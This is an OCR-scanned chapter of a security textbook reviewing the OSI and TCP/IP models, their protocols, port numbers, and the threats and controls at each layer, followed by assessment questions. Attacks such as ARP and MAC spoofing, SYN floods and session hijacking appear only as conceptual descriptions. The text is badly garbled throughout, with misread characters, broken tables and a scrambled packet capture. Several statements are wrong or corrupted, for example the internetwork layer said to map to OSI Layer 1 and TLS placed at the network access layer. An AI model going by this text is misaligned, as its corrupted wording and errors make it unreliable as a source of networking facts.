MAC flooding and I CMP assaults such as Smurf

Passive and active sniffing, MAC spoofing,

and WEP cracking

Hardware hacking, lock picking, physical access
attacks, wiretapping and interception

FIGURE 2-4

Attack layers and

the 051 reference model

Mapping the OSI to Functions and Protocols

Although this chapter is meEint to serve only iis a primer or introduction to the OSI reference
model and TCP/IP protocol, and the concepts introduced here will be explored in depth lat er,
it still is important to understand some details now. Note that later on in this text several
attacks will be discussed. Figure 2-4 will help to provide context for that kiter discussion.

OSI Layers and Services

Although TCP/IP is the dominant networking model, the OSI reference model remains
important. It has served as an invaluable tool or reference model that can be used to map
the location of various services. Table 2-1 illustrates each layer of the OST reference model
and some of the various services found at each layer. The OSI reference model protocols at
the implication layer handle Hie transfer, virtual terminals, and network management, and
fulfill networking requests of applications. A few of the protocols are shown in Table 2- 1 .

table 2-1 OSI layers anc

I common protocols.

OSI REFERENCE MODEL LAYER

COM MOW PROTOCOLS AND APPLICATIONS

Application

FTP, TFTP, SNMP, Telnet, HTTP, DNS, and POP3

Presentation

ASCII, EBCDIC, TIFF, JPEG, MPEG, and MIDI

Session

NetBIOS, SQL, RPC, and NFS

Transport

TCP, UDR SSL, and SPX

Network

IP, ICMR IGMP, BGP, OSPF, and IPX

ARP, RARP, PPP, SLIP, TLS r L2TP, and LTTP

Physical

HSSI, X.21, and EIA/TiA-232

32

PART 1 Hacker Techniques and Tools

TCP/IP is not a new protocol; in fact, the protocol has its genesis back in the early 1970s with
the Defense Advanced Research Projects Agency (DARPA). TCP/IP was designed to be part
of a network structure that would be flexible and resilient enough to lower the risk of failure.
The protocol has proven to be a very flexible and we 1 1 -designed protocol. Although version 4
(IPv4) is by far the most used version, use of IPv6 is starting to increase. However, for all the
advantages that the IP protocol has r one thing it does not do well is security. The original
architects of the protocol never foresaw the security issues that are present today.

TCP/IP (a Layer-by-Layer Review)

Having explored the OSI reference model and looked at examples of each Jayer H let’s
turn our attention to TCP/IP.

It is important to envision TCP/IP as a suite of protocols that controls the way
information travels from location to location, and to realize early on that TCP/IP is
a collection of protocols lhat perform a wide array ol” funelions. This is the reason why
TCP/IP is known more accurately as the TCP/IP protocol suite. When individuals refer
to the TCP/IP protocol they are generally referring to the IP role of the suite,, which
is the one responsible for addressing and routing information.

Out of the fairly targe suite of TCP/IP protocols there are four protocols that generally
serve as the foundation of the TCP/IP suite: IP. TCP, I IDE and ICMP These protocols are
so vital to normal network functioning that no device will exist on a TCP/IP network
without supporting ail of them. Each of the four main protocols provides some vital
service or purpose that will be explored later in this text. It is possible to tie in at least
a few of the items that nave been mentioned so far {such as encapsulation) because each
of these protocols in some way prepares the data to be moved on the network as it leaves
Layer 7 and moves down. An example of the TCP/IP slack can be seen in figure 2-5.

FIGURE 2-5

A comparison of TCP/IP
and the OSI reference
modeL

s

Application

6

Presentation

5

r

Session

Transport

3

w ^

Network

k

2

L

Physical

Application

OSI Reference Model

Physical
TCP/IP Model

CHAPTER 2 TCP/IP Review

33

Although TCP/IP is has proven to be a flexible mid robust network protocol, it was
i m possible for the designers of the protocol to anticipate every eventuality that could
have arisen. A more trusting environment existed when TCP /TP was designed. As such,
the protocol lacks significant security capabilities. In tact, several components of TCP/IP
are insecure. Ah hough J Pvft is quickly emerging as the replacement for IPv4 and will
include security measures designed to address the problems, it is far from being In

Pay special attention to the security concerns associated with each layer and its
s pre l lie protocols. The four layers of TCP/IP include the following:

• Application layer
• Host-to-host layer

• Internet layer

• Network access layer

• Physical/Network Access Layer

The physical /network access layer, which resides at the lowest layer of the TCP/IP model,
is the point at which the higher-layer protocols interface with the network transport media.
When comparing to the OSI reference model, this layer corresponds to OS I Layers 1 and 2.

Physical/Network Equipment

Physical/network equipment located at this layer of the TCP/IP model usually includes
the following devices:

Repeaters — A device that amplifies, reshtipes. or regenerates signals during
retransmission. Typically these devices are used when long distances need to be
covered and the distance exceeds the supported length of the medium.

■ Hubs — A hub receives a signal on one port and retransmits it to every other port
on the hub. It does not alter the transmission in any way. Although common

in networks that were smaller in nature, hubs are not nearly as common today.
Hubs possess several ports.

■ Bridges — Whereas hubs receive a signal on one port and retransmit it to every
other port indiscriminately, a bridge does not do so. Bridges direct information based
on MAC addresses and as such can control the flow of traffic much better than hubs
can. These devices only send information to ports that actually are the intended
recipients of the information. They initially seiw increased popularity due to their
ability to overcome problems associated with hubs.

bridges by providing the following:
• Extremely low latency

• Switches can operate in half duplex or full duplex modes.

• ■ All forwarding decisions are based on a destination MAC address,

• Each port is a separate collision domain.

34

PA RT 1 H ac ke r Techn iq ties and Too I s

Although low-end consumer switches have limited functionality, more expensive
switches that are found in large networks provide greater functionality. These higher-end
switches typically provide the following:

• A command line interface via Telnet or console port to configure remotely
• A brow ser-b ased interface fo r con li gurat io n

to make their product easier than, or different from, a competitor’s. Even with this
functionality, all devices connected to a switch are thought to he part of the same
broadcast domain: that is> each port on a switch is a separate collision domain.
A broadcast frame sent by any particular device on a switch is automatically forwarded
to all other devices connected to the switch.

Physical/ Network Layer Protocols

Protocols found at this layer include ARP, Reverse Address Resolution Protocol (RARP),
Transport Layer Security (TLS). Layer 2 Tunneling Protocol (L2TP), LTTP Point -to- Point
Protocol (PPP), and Serial Line Interface Protocol (SLIP), One of the most important
services is ARP.

ARP’s role is to provide the ability to resolve IP Eid dresses to an unknown MAC address,
ARP works by using a two-step process to perform resolution. First, it uses a broadcast
requesting a physical address from a target. Each device processes the request* and if
the station with the address requested is reached, it responds with its physical or MAC
address. Requests that are returned are cached on the local system for later reference
if needed.

The ARP cache on a system can be viewed at any time by using the ARP — a command
at the command line on a system. An example of this command is shown here:

NOTE

C:\>arp -a

Interface: 192.168.123.114 —

0x4

You can permanently maintain or
statically add an ARP entry by using
entry, the future request will speed up

192.168.123.121 0(M!l-SS-12-26-bf> dynamic
142.1 68.1 2 3.1 30 QO-23-4d-7O-af-20 dynamic
192.168.123.254 00-1 c- 1 0-f5-6 l-9c dynamic

not have to occur due to the request
being cached. Add the string J ‘pub”
to the end of the command,, and

that are accepted as valid. The switch then “thinks” that
the attacker is really the other system, and redirects traffic

For example, an attacker can provide falsi lied ARP responses

You can use ARP to hypass the features in a switch.

the system will act as an ARP server,
answering ARP requests even for an
fP that it does not possess.

CHAPTER 2 TCP/IP Review

35

NOTE

Although many types of frames
can be presenter handled at
this layer of the TCP/IP model,
Ethernet is by far the most
common. Ethernet frames have
several characteristics; one is using
at this leveL

Also included at this layer are legacy protocols known
as Serial Line Interface Protocol (SLIP) and Foint-to-Foint
Protocol (PPF). Although bolh provide the ability to transmit
data over serial links, PPP is more robust than SLIP and has
therefore displaced SLIP in many implementations. For the
most part, SLIP is seen only in very specific environments
and deployments, such as older networks,

Physical Layer Threats

.Several security threats exist at this layer. Before security
professionals can understand how to defend against them,
they must first understand the attacks. Some common threats
found at this layer include the following.:

Spoofing MAC addresses — Hackers can use a wide variety of programs to spoof
MAC addresses or even use the features built into an operating system to change
their MAC. By spoofing MAC addresses, attackers can bypass 802.11 wireless
controls or when switches are used to control traffic, by locking ports to specific

■ Wiretapping — The act of monitoring Internet and telephone conversations
covertly by a third party. In essence, this attack requires you to tap into a cable
for a wired network, but can involve listening in on a wireless network,

• Interception — Packet sniffers are one of the primary means of intercepting
network traffic.

■ Eavesdropping — The unauthorized capture and reading of network traffic.

Physical Layer Controls

In order to protect against physical layer attacks some simple countermeasures can
be employed:

• Fiber cable — Choice of transmission media can make a tremendous difference

in the types of attacks that can be carried out and how difficult said attacks may he.
For example, liber is more secure than the w T ired alternatives and also more secure
than wireless transmission methods.

• Wired Equivalent Privacy (WEP) WW was an early attempt to add security

to wireless networking. Although it is true that wireless networks can offer a level
of security, this security is considered to be weak by today’s standards. WEP has
been largely replaced in favor of WFA and WPA2. In practice it should be used only
in noncritical deployments, if at all.

36

PART 1 Hacker Techniques and Tools

Wi-Fi Protected Access (WPA} — WPA was introduced as a more secure and
more robust overall alternative to WEP and has proven to be more secure than
WEP in practice.

• Wi-Fi Protected Access 2 (WPA2) — WPA 2 is an upgrade that adds several
improvements over WPA, including encryption protocols such as Advanced
Encryption Standard (AES] and Temporal Key Integrity Protocol fTKIP) as welt
a s be tier key m a n a ge m en I over W PA ,

• Point-to-point Tunneling Protocol (PPTPJ — PPTP is widely used for virtual
private networks (VPNs), PPTP is composed ol two components: the transport
that maintains the virtual connection and the encryption that ensures
uonlkientialily.

• Challenge Handshake Authentication Protocol (CHAP) — CHAP is an
improvement over previous authentication protocols such as Password
Authentication Protocol (PAP), in which passwords were sent in cleartext.

Internetwork Layer

The next layer is the internetworking layer, which maps to Layer I of the OSI
reference model.

Internetworking Layer Equipment

The primary piece of equipment located at the internetwork layer is the router.
Routers differ from switches found at the lower layers in that they direct traffic using
logical addresses as opposed to the physical addresses used by switches. Furthermore^
routers are meant to move traffic between different networks to form paths to direct
traffic between multiple networks. Routers allow packets to flow from the source
device’s network to the destination device’s network. Points to remember about
routers include the following:

FIGURE 2-6

Bit Number: 0

16

31

Data (TCP segment]

Version

II IL

Differentiated
Services

Total Length

Identification

Flags

Fragment Offset

Time to live

Protocol

Options

Data

CHAPTER 2 TCP/IP Review

37

• Does not forward broEidcast packets
• Forwards multicast packets

• Has highest latency

• Has most flexibility

• ■ Makes forwarding decisions on basis of destination IP address.

• Req u ire s co n li gu rat ion

Routers are also known as edge devices because of their placement at the point where
multiple networks come together Routers rely on items known as routing protocols
to ensure that traffic gets to the correct location.

is addressed to. Once this is located > the router can consult
ei routing table to determine where to send the information.

A router can be configured either statically or dynamically, depending on the require-
ments in a given situation. Static routing is a routing table that has been ere ei led by ei
network Eidministrator who is knowledgeable about the layout of the network and enters
this in form tit ion manually into the routing table. Static routing is used mainly on small
networks; it quickly loses its utility on tEirger networks because the manunl updates
would take increasing amounts of effort to keep up to date.

Dynamic routing represents the more commonly used option in networks and routing
tables, Dynamic routing uses a combination of factors to update it automatically and
the same factors to determine at any time where to send the information in question.
Dynamic routing protocols include: RIP P Border Gateway Protocol £BCPL Interior Gateway
Routing Protocol (IC1RP), and OSPF. Within the protocols marked as dynamic routing
are two subcategories known as distance vector and link-state routing.

The basic methodology of a distance vector protocol is to make a decision on what is
the best route by determining the shortest path. The shortest path is commonly calculated
by what are known as hops. RIP is an example of a distance vector routing protocol.
RIP has several issues from a security standpoint:

• is su b jec t to rou t e po i so n i n g
■ Has no authentic ation

Might not choose the best path

Routing Protocols

The aforementioned routing protocols determine the best path
to send traffic at a point in time. The two best examples of
routing protocols are Routing Information Protocol (RIP) and
Open Shortest Path First (OSPF). Routers are optimized to
perform the vital function of routing traffic between networks
and ensuring that traffic reaches its intended destination. When
receiving a packet, a router examines the header of the packet
(see Figure 2-6} with specific emphasis on the address the packet

Routing tables contain information
that allows a router to quickly look
up the best path that can be used
to send the information. Routing
tables are updated on a regular
schedule in order to ensure that
information contained within
them is accurate and accounts for
changing network conditions.

PART 1 Hacker Techniques and Tools

A hop count describes the number of routers that a packet must pass through, or traverse,
to reach its destination. Each time a packet passes through a router one hop is made, and
in routing terms a hop is added to the hop count. RIP is the most common routing protocol
that uses a hop count as its primary routing metric. Hop counts have some disadvantages over
protocols that use distance vectors in that the path with the lowest number of hops may not
be the optimum route. The lower hop count path may have considerable less bandwidth than
the higher hop count route.

Link state calculates the best path to a target network by one or more metrics such as
delay, speed, or bandwidth. Once this path has been determined, the router will inform
other routers what it has discovered. Link state routing is considered more flexible and
robust than distance vector routing protocols, OSPF is the most common link state
routing protocol and is used as a replacement for RIP in most large-scale deployments.

OSPF was developed in the mid-1980s to overcome the problems associated with RIP
Although RIP works well when networks are small in size, it rapidly loses its advantages
when the network scales up in size. OSPF has several built-in advantages over RIP that
Include the following:

• Security
• The use of IP multicasts to send out router updates

• • I’n limited hop count

• Fast convergence

Internetwork Layer Protocols

The most important protocol in the TCP/IP suite is IP because of its central role in
addresses and routing. It is a routable protocol that has the role of making a best effort at
delivering information, IP organizes data into a packet* prepares it for delivery, and places
information known as the Time to Live {TTL) to a packet. The goal of aTTL is to keep
packets from traversing the network forever. If the recipient cannot be found, rather
than traveling the network forever, the packet can eventually be discarded.

Taking a closer look at the important IP address, there are some details that start to
emerge that reveal how routing and other functions lake place. One part of the IP address
refers to the network, and the other refers to the host. In Itiyman’s terms* the network
is equivalent to the street in a postal address, and the host is the house number on a given
street. Combined, they allow you to communicate with any network and any host in the
world that is connected to the Internet.

CHAPTER 2 TCP/IP Review

39

1 1 1 addresses are laid out in a dotted decimal notation format that divides the address
up into four groups of numbers representing ft bits apiece. IPv4 lays out addresses into
Ei four-decimal number formal that is separated by decimal points. Each of these decimal
numbers is 1 byte long to allow numbers to range from 0-2 5 5. You can tell the class of
tin JJ’ mUiri’ss hy I unking ai liu- lirsi octet. An example of IPv4 addressing js shown here:

A 1-126

E 127-191

C 192-223

D 224-2 39

E 240-2 55

Each of the classes is designed to divide up the number of
networks and hosts with larger or smaller networks being possible
depending on the class. A class A network offered the fewest
networks with the greatest number of hosts with Class C offering
the opposite. Class D and E are used for different purposes that
this chapter will not discuss.

A number of addresses have been reserved for private use. These
addresses are n on rou table, which means that manufactures of
routers program them not to propagate network traffic from these
ranges routes normally. Address ranges set aside as no n rout able,

NOTE

Each section of an IP address
separated by a decimal is
commonly known as an octet,
which comes from the binary
notation used to represent
it. Any number present in
an IP address (0-255) can be
represented by a sequence
of eight ones and zeros.

A
B

C

in. 0.0.0-10.255.255.255.255

172,16,0,0-17231*255,255

192.168.0.0-192,168,255,255

Default

255;0.0,0

255,255.0.(1

255.255,255.0

NOTE

A good example of an attack
against an IP is what is known
as a teardrop attack. Malformed
fragments can crash or hang
older operating systems
that have not been patched.
Specifically in this attack, a
packet is transmitted to a system
that is larger than the system
can handlej resulting in a crash.

Many home routers use a default address of 192.1 68. 0. 1 or
1 92.1 hH. 1,1. This means that a home network is no n rou table
“right out of the box, 1 ‘ which is a very desirable security feature.

Also located at the internetwork layer is the Internet Control
Message Protocol (I CMP), which was designed for network
diagnostics and to report logical errors. TCP/IP environments must support ICMP
because it is an essential service tor nel work management. ICMP provides error reporting
and diagnostics, and ICMP messages follow a basic format. The first byte of an ICMP
header indicates the type of ICMP message. The byte following contains the code for
each particular type of ICMP. Tight of the most common ICMP types are shown here:

40

PA RT 1 H ac ke r Techn iq ties and Too I s

IC MP type

Code

Function

0/8

0

Echo Response/ Request (Ping)

I

0-15

Destination I ” n re ei enable

4

0

Source Quench

5

0-3

Redirect

11

0-1

Time Exceeded

12

0

Parameter Eault

13/14

0

Tim est amp Request/ Response

17/1S

0

NOTE

Ping gets its name f rom the
by sonar in ships and submarines
to locate other vessels that may
be lurking nearby. A ping from a
sonar device bounces a sound off
a hull of a ship as an echo, letting
the sender know where the lurker
happens to be.

The most common tool used by network administrators
associated with ICMP is a ping h which is useful in determining
whether a host is up. It is also useful for attackers bee ti use
they can use it to enumerate a system {it can help the hacker
determine whether a computer is online I,

Internetwork Layer Threats

One threat that will be discussed more in depth later in this
text is known as a sniffer [also commonly referred to as a
protocol analyzer). Sniffers are hardware- or softw r are-based
devices that tire used to view and /or record traffic that flows
over the network.

Sniffers are useful and problematic at the same time because network traffic that
might include sensitive data can be viewed through the use of a sniffer It is not uncommon
for corporate IT departments to specifically deny the use of sniffers except by those
specifically authorized to use them. Sniffers pose a real risk in that a less- than -ethical
individual might intercept a password or other sensitive information in clear text and
use it later for some unauthorized purpose.

In order to realize the full potential of a sniffer, certain conditions have to be in place;
most important is the ability for a network card to be put into promiscuous mode. In other
words, the card can view all traffic moving past it rather than just the traffic destined for
it. There are programs to accomplish this for Linux and Windows users. Linux users can
download libpeapat http’J fsourceforge. net /projects/ hhpcapL Windows users need to install
the vvinpeap library, available at http://wwwAvinpaip.org. Just remember that promiscuous
mode allows a sniffer to capture any packet it can see, not just packets addressed to the
device. Next, you have to install a sniffer.

The most widely used sniffer is known as Wireshark, Wireshark has gained popularity
because it is free, easy to use, and it works as well as or better than most commercial
sniffing tools. Wireshark, just like other sniffers, comprises three displays or window’s.
To get an idea of w T hat the display looks like, look at Figure 2-7.

CHAPTER 2 TCP/IP Review

1941 36. 50OU3 16S, 123.114

l*t3 36. 5Q34S7
1944 36.504170

194 5 3.6. 50421 S

19?, 163, 123.114
162. 165. 123.114
192.168.123.114

74.12i.15S.1 01

192,168.123.254 DM5

19M6S.123.254 mi

1. 16S. 123. 254 DW5

4 519 * http [SYN

standard query ^
Standard query A
standard query a

1947 36. 543969 192. 163. 123 . 254

iLTi:K^iiMf im ifinnni

1949 36.5 50293 192. 16S. 123 , 254

1950 36.551395 192.103,123.11:

1951 34, 5 53370 162,16$. 123*234 1952 36.563213 74.12S.95,95 192.168.123.114 192,168.123.114 192.168.123. 254 192,169,123,114 192.168.123,114 1954 36. 5691Z7 195 5 36. 569736 1956 36. SS2S67 1957 36. 610664 l[*2,T5eriTS;2S4 192.163. 123.254 209. St.i2S.93 74,121.15 5.101 i i. • itindard que ry rc standard query A OWS Standard query rs C«£ standard query A ws standard query re TCP http 4 515 [FIK, 1$2/168- 123.11-4
192.168.123.114

1. 1£S. 123.114
192.168.123.114

r i-

TCP
TCP

Standard qusry rg
standard query re

http > 4 514 [AC hi]

http. > 4 519 [syn.

i*i Frame 194B (B5 bytes on ^Ire, 85 bytes captured)

w Ethernet II, Src: cUco-Lt_11;c* :3c C00:la: 70:11 :c4:3c>, est: ci sco-Li_f 5 ; 61; 9c (00:1c:
it] inter net protocol, srci 192. 168. 123. 114 C192.168.123.114X est: 192. 163. 123. 254 (192.16
si User Datagram Protocol, Src Port: 56956 C569S6) J Dst Port: damain CJ3:>
t Domain Name System (query)

0000
0010
0020
0030
0040
0050

■ I – I f – -.1 00 ■ .1

00 47 90 lb 00 00 SO 11

7b f § St 7C 00 35 00 33

00 00 00 DO 00 00 Oc 67

74 %f 73 OS 62 6C 6f 6?
00 00 01 DO 01

70 11 C4 3C 08 00 45 00

31 C9 cO aS ?b 72 cO aS

Fb ‘1 2 «9 at 01 00 00 01

flf 6f 67 6c 65 70 6S «f

1. 70 6f ?4 03 63 6f 6d

■ r r ■ 4 ■ in P n ■ ^ ■ ■ E ■

.G 1… ■{[*. .

^..1.5.3 ,e

g cctjlepho

tns. blog spct.cmi

FIGURE 2-7

Wire shark.

At the top of the figure, you can see a number of packets that have been captured.
Tn the middle of the figure, you can .see the one packet that has been highlighted for
review. At the bottom of the tigure. you can see the contents of the individual frame.
If you want to learn more about sniffers. Wires hark is a good place to start. It can

Internetwork Layer Controls

Moving up the TCP/IP stack, the following controls are useful at the internetwork layer.

• IPSec — The most widely used standard for protecting JP datagrams is IPSec. IPSec
can be at or above the internetwork layer. IPSec can be used by applications and
is transparent to end users, IPSec addresses two important security problems with
data in transit: keeping the data coniidential and maintaining its integrity.

Packet filters — Packet filtering is configured through access control lists (ACLs),
ACLs enable rule sets to be built that will allow or block traffic based on header
information. As traffic passes through the router, each packet is compared with the
rule set, and a decision is made as to whether the packet will be permitted or denied.

need for IP addresses (discussed in Request for Comments [RFC] 1631), MAT can
be used to translate between private and public addresses. Private D? addresses are
those that are considered unrou table. Being unroutable means that public Internet
routers will not route traffic to or from addresses in these ranges. A small measure
of security is added by using NAT.

42

PART 1 Hacker Techniques and Tools

Host-to-Host Layer

The ho s Mo – host layer provides end-to-end delivery. This layer segments the data
and tidds a checksum in order to properly validate data to ensure that it has not been
corrupted. A decision must be made here to send the data with TCP or UDP, depending
on the speciiic application.

HosMo-Host Layer Protocols

This primary job of the host-to-host transport layer is to facilitate end-lo-end communi-
cation. This layer is often referred to as the transport layer. The following sections
describe the two protocols at this layer:

• TCP

• UDP

TCP provides reliable data delivery services and is a connect ion -oriented protocol.
TCP provides reliable data delivery, flow control, sequencing, and a means to handle
startups and shutdowns. TCP also uses a three-step handshake to start a session. During
the dEila-transiiiission process, TCP guarantees delivery of data by using sequence
and ac kno wled gm en t numbers. At the completion of the da la -transmission process,
TCP performs u four-step shutdown thai gracefully concludes the session. The startup
sequence is shown in Figure 2-8.

TCP has li lixcd packet structure (see Figure 2-9). Port scanners can tweak TCP flags
and send them in packets that should not normally exist in an attempt to elicit a response
from a targeted server,

Like TCP, UDP belongs to the host-to-host layer, Unlike TCP, I. DP is a connectionless
transport service, UDP does not have startup, shutdown, or any handshaking processes
like those performed by TCP. Because there is no handshake with UDP, it is harder to scan
and enumerate. Although this makes it less reliable, it does offer the benefit of speed,
UDP is optimized for applications that require fast delivery and are not sensitive to
packet toss, UDP is used by services such as Domain Name Service (DNS),

FIGURE 2-8

TCP startup
and shutdown.

Request for
connection

SYN

SYN-ACK

Client

Response

Server

Connection
established

CHAPTER 2 TCP/IP Review

43

Bit Number: 0

16

Source Port

Destination Port

Sequence number

Acknowledgment

length

Reserved

u

R

G

p

S

5

¥

Checksum

Options

Data

Sliding -window size

Urgent pointer

31

FIGURE 2-9

TCP frame struct ure.

Host-to-Host Layer Threats

Some of the most common host-to-host layer attacks arc shown here:

• Port scanning — A technique in which a message is sent to each port, one

at a time. By examining the response, the attacker can determine weaknesses
in the applications being probed and determine what to attack.

Session hijack — A type of attack in which the attacker places himself between
the victim and the server. The attack is made possible because authentication
typically is done only at the start of a TCP session.

• SYN attack— A SYN attack is a distributed denial of service (DDoS) attack in which
the attacker sends a succession of SYN packets with a spoofed return address to a
targeted destination IP device, but does not send the last ACK packet to acknowledge
and confirm receipt, Eventually, the target system runs out of open connections
and cannot accept any new legitimate connection requests.

Host-to -Host Layer Controls

Although the host-to-host layer is where you find TCP and IJDP, you need to remember
that these protocols are not designed for security. Their goal is reliable or fast delivery.
Listed here are some host-to- host security protocols:

Secure Sockets Layer (SSL) — SSL is considered application independent and can
be used with Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP),
and Telnet to run on top of it transparently. SSL uses RSA public key cryptography

• Transport Layer Security (TLS) — TLS is an upgrade to SSL and is backward
compatible, but they do not intemperate. TLS, much like SSL, is designed to be
application independent.

44

PA RT 1 H ac ke r Techn iq ties and Too I s

• SOCKS — Another security protocol developed and established by Internet standard
RFC 192 fi. It allows client-server applications to work behind a firewall and utilize
their security features.

Secure RFC (S/RPC) — Adds an additional layer of security onto the RPC process
by adding Data Encryption Standard (DPS) encryption

Application Layer

This section examines the application layer, which maps to OSI Layers 5, 6, and 7.
The application layer internets with applications that need to gain Etc cess to network
services.

Application Layer Services

There are many application layer services present at this layer; however, not all are of
importance to the security professional Focus on the services that have the greatest
potential for abuse and misuse and therefore represent the greatest threat. Services
are assigned a port number. There are 65,5 3 5 ports: they are divided into well-known
ports (0-102 3 ), registered ports (1024-49151 ), and dynamic ports (49152 -65 5 35).
Although there are hundreds of ports and corresponding applicEitions in practice, fewer
than J DO are in common use and of these only a handful will be encountered on a regular
basis. The most common of these are shown in Table 2-2. These are some of the ports
that a hacker would first look for on a victim’s computer systems.

You should practice the deny-all principle and enable
just those ports that are needed instead of memorizing each
port and deciding whether to block it or not. Simply put.
you should block everything and allow only what is needed.
If a port is not being used, and deny-all is the practice,

Going back to the earlier issue of TCP/IP being designed
when more trust was given to networks, all applications
are not created equally. Although some, such as Secure
Shell (SSII), are designed to be secure alternatives to Telnet,
you might encounter the less secure options in practice.
The following list discusses the operation and security issues
of some of the common applications:

DNS — DNS operates on port 53 and performs address translation. DNS serves
a critical function in that it converts fully qualified domain names (TO DM si
into numeric TP addresses or IP addresses into FQDNs. DNS uses HDP and TCP,

FTP — FTP is a TCP service that operates on ports 20 and 21 . This applicEition
is used to move files from one computer to another. Port 20 is used for the data
stream and transfers the data between the client and the server. Port 21 is the
control stream and is used to pass commands between the client and the PTP server.

NOTE

Every firewall is different in respect
to configuration, but by default
most firewalls have most if not
all their default ports and services
disabled, Et is up to you, as the
security professional, to determine
what you need enabled to make
the network usable and enable
just those features you need to
function.

CHAPTER 2 KfVIP Review

45

• HTTP — HTTP is a TCP service that operates on port Hi). HTTP uses a request response
protocol in which a client sends a request and a .server sends a response. Because
HTTP is generally on Web servers, and Web servers tire a very public and exposed asset,
the protocol is very commonly exploited by all sorts of threats, including malware,

• Simple Network Management Protocol (SNMP) — SNMP is a UDP service and operates
on ports 161 and 162. Some of the security problems that plague SNMP Eire caused
because community strings (which act as a pseudo-password) can be passed as
cleartext and the default community strings (public/ private) are well known. SNMP
version 3 is the most current and it offers encryption.

• Telnet — Telnet is a TCP service that operates on port 2 3, Telnet enables a client at one
site to establish a session with a host at another site. The program passes the information
typed at the client’s keyboard to the host computer system. Telnet sends data in the clear.

TABLE 2-2

Computer ports, services, and protocols.

PORT

1 \J 1 \ 1

SERVICE

J l ..W V IVL

PROTOCOL

21

FTP

1 IE

TCP

TCP

1 \— 1

23

jrp

1 ^_ 1

25

SMTP

TCP

1 S— 1

DNS

TCP/UDP

67/68

DHCP

UDP

69

TFTP

UDP

79

Finger

TCP

SO

HTTP

TCP

88

Kerberos

UDP

110

POPS

TCP

111

SUNRPC

TCP/UDP

135

MSRPC

TCP/UDP

139

NB Session

TCP/UDP

161

SNMP

UDP

162

SNMP Trap

UDP

3S9

LDAP

TCP

443

SSL

TCP

445

SMB over IP

TCP/UDP

1433

MS-SQL

TCP

PA RT 1 H ac ke r Teehn iq ues a n d Too I s

• Simple Mail Transfer Protocol (SMTP) — This application is a TCP service that
operates on port 25, It is designed for the exchange of electronic mail between
networked systems. Spoofing and spa mm in g are two of the vulnerabilities
associated with SMTP.

Trivial File Transfer Protocol (TFTP) IT TP operates on port 69. Tt also requires
no authentication, which could pose a big security risk. It is used to transfer
router configuration files and by cable companies to configure cable modems.

Application Layer Threats

Although numerous application layer threats exist, listing all of them is unnecessary.
Some of the more common are briefly listed here to serve as an Introduction to in-depth
discussions in later chapters:

• Mai ware — Software developed for the purpose of doing harm. Examples of ma I ware
include the following:

■ Tro j an — A prog ra m t h at d oes s o m et h in g u nd o c u me n ted th a 1 1 he prog r a m m e r
or designer intended, but the end user would not approve of if he or she knew

Spy ware — Any software application that covertly gathers in form tit ion about
a user’s activity and reports such to a third party

• Virus — A computer program with the capability to generate copies of itself and
spread file-to-file. Because viruses usually require the interaction of an Individual,
they spread very slowly. Viruses can have a wide range of effects, including
irritating the user or destroying data.

Worm — A self- replica ling program that spreads by inserting copies of itself into
other executable codes, programs, or documents. Worms replicate from system
to system (instead of file-to-iile), and thus spread much more rapidly than viruses.
Some worms can Hood a network with traffic and result in a Do S attack by
consuming bandwidth and other resources,

• DoS — Occurs when an attacker consumes the resources on a target computer
for things It was not intended to be doing, thus preventing normal use of network
resources for legitimate purposes Examples of DoS attacks include the following:

• DoS attack — Although these a tt ticks are known by different names (for example,
smiuT. SVX Hood, loniJ urea n el work denial LAXDj, and i Wiggle l . each i>. designed
only to disrupt service.

• DDoS attack — Similar to DoS. except the attack is launched from multiple
distributed agent IP devices. Examples of I!) DoS programs include Tribal Flood
Network (TFN), TFN2K, Shaft, and Trinoo.
• Botnets — A term used to describe robot-controlled workstations that are part
of a collection of other robot-controlled workstations. These devices can be used
for DoS or to flood systems with spam.

• CHAPTER 2 TCP/IP Review

47

r

Virus Scanners

SSHSET

Application

PGP S/MIME

Kerberos

Secure Coding

TACACS

Physical
TCP/IP Model

SSL
TLS

SOCKS

S/RPC

1

P

S

Packet
Filters

PPTP L2TP

e
c

CHAP WEP

NAT

Fiber

FIGURE 2-10

TCP/IP model and
each layer’s controls.

Controls and Countermeasures

Application Layer Controls

Following are some examples of application layer controls. An overview of the controls
discussed for each layer of the TCP/IP model can be seen in Figure 2-10.
Some Eip plication layer software controls include the following:

• Mai ware scanners — Anti-ma I ware programs can use one or more techniques to
check files and applications for viruses. These programs use a variety of techniques
to scan and detect viruses. Ma I ware detection software has changed from an
add-on tool to a must-have system requirement.

• SSH — A secure application layer program that has security features built in.

SSI I sends no data in cleartext. Usern a me/pas swords are encrypted. SSIIv2 offers
even greater protection.

Pretty Good Privacy (PGP) — PGP uses a public-private key system and offers
strong protection fore-mail.

• Secure/Multipurpose Internet Mail Extension (S/MIME) Secures e-mail by using
X.SG9 certificates for authentication. S/MIME works in one of two modes: signed
and enveloped.

48

PART 1 Hacker Techniques and Tools

■-

CHAPTER SUMMARY

This chapter examined some qf the more commonly used applications and protocols
used by TCP/IP. The purpose of this review was to better understand how the protocols
work. Understanding the underlying mechanics and functioning of a protocol allows
the security professional to betler defend against attacks. Knowing the mechanics
of li protocol also assists in the understanding of the attacks themselves.

As a security professional, it is of vital importance to be not just reactive, but proactive.
Thinking about how an attacker could leverage or exploit holes present In systems
is an invaluable tool in your toolbox. The knowledge presented in this chapter will
emerge in different forms and in different places throughout the rest of tins ivxi .

KEY CONCEPTS AND TERMS

Institute of Electrical and

Router

Serial Line Interface Protocol

[ARP)
Deny-all principle
Domain Name Service {DNS)
Encapsulation
Firewall
Flow control

Electronics Engineers (IEEE)
fayer 2 Tunneling Protocol

(SLIP)
Sniffer
SYN attack

Transport Layer Security (TLS)
User Datagram Protocol (UDP)

(L2TP)

Media access control (MACJ

Frame

Physical/network equipment

Protocol fRARP)

CHAPTER 2 TCP/IP Review

49

CHAPTER 2 ASSESSMENT

1. What is the networking layer of the OSl
reference model responsible for/

A, Physical layer connectivity

B. Routing and delivery of IP packets
C Formatting the data

D. Physical framing

E. None of the above

1. Which of the following is not an attribute

of OSPF?

A. Security

B. The use of IP multlcasts to send out

C No limitation for hop count
D. Subject to route poisoning

1. Which of [he following makes I J DP harder
to scan for?

B. Lack of startup and shutdown
C Speed

11 Versatility

1. Which of the following best describes
how ICMP is used?

A, Packet delivery

B. Error detection and correction
C Logical errors and diagnostics
D. IP pac ket dc livery

1. The most common type of ICMP message
Is
• Which of the following statements most
closc-h esses I Ik- difference iji mini ml:
and routable protocols?

• A. IP is a routing protocol, whereas RIP
Ls a mutable protocol.

B. OSPF is a routing protocol, whereas IP
Is a routable protocol.

